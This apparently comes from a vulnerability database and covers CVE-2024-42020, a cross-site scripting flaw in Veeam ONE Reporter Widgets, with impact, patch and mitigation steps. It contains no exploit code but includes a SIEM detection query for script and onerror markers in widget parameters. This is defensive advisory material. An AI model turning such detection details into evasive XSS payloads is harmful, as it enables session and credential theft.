CVE-2024-42020 – A cross-site scripting (XSS) vulnerability in V... (How to Fix)

Q: What is the severity of CVE-2024-42020?

CVE-2024-42020 has a CVSS score of 5.4 (MEDIUM). A cross-site scripting (XSS) vulnerability in Veeam Reporter Widgets allows attackers to inject malicious HTML content. This affects Veeam ONE users who access compromised widgets, potentially leading to session hijacking or credential theft.

📋 TL;DR

A cross-site scripting (XSS) vulnerability in Veeam Reporter Widgets allows attackers to inject malicious HTML content. This affects Veeam ONE users who access compromised widgets, potentially leading to session hijacking or credential theft.

💻 Affected Systems

Products:

Veeam ONE

Versions: Versions prior to 12.1.2.172

Operating Systems: Windows Server

Default Config Vulnerable: ⚠️ Yes

Notes: Affects Reporter Widgets functionality within Veeam ONE web interface.

📦 What is this software?

One by Veeam

View all CVEs affecting One →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, hijack sessions, and gain full control over the Veeam ONE environment, potentially compromising backup infrastructure.

🟠

Likely Case

Attackers inject malicious scripts to steal session cookies or credentials from authenticated users, leading to unauthorized access to Veeam ONE.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized, preventing successful exploitation.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to Veeam ONE web interface and ability to interact with Reporter Widgets.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 12.1.2.172

Vendor Advisory: https://www.veeam.com/kb4649

Restart Required: Yes

Instructions:

1. Download Veeam ONE 12.1.2.172 from Veeam website. 2. Run the installer on the Veeam ONE server. 3. Follow upgrade wizard. 4. Restart Veeam ONE services after installation.

🔧 Temporary Workarounds

Input Validation Enhancement

all

Implement additional input validation for widget parameters to reject malicious HTML content.

Content Security Policy

all

Implement strict Content Security Policy headers to prevent script execution from untrusted sources.

🧯 If You Can't Patch

Restrict access to Veeam ONE web interface to trusted networks only.
Implement web application firewall (WAF) rules to detect and block XSS payloads.

🔍 How to Verify

Check if Vulnerable:

Check Veeam ONE version via web interface: Help > About. If version is below 12.1.2.172, system is vulnerable.

Check Version:

Not applicable - check via web interface or Windows Programs and Features

Verify Fix Applied:

After patching, verify version shows 12.1.2.172 or higher in Help > About menu.

📡 Detection & Monitoring

Log Indicators:

Unusual HTML/script content in widget parameter logs
Multiple failed widget rendering attempts

Network Indicators:

HTTP requests containing suspicious script tags in widget parameters

SIEM Query:

source="veeam_one" AND ("widget" AND ("script" OR "javascript" OR "onerror"))

📊 Metadata

CVE ID: CVE-2024-42020

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

Published: September 7, 2024

Last Updated: October 27, 2024

🔗 References

https://www.veeam.com/kb4649 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-42020, you might also want to check these: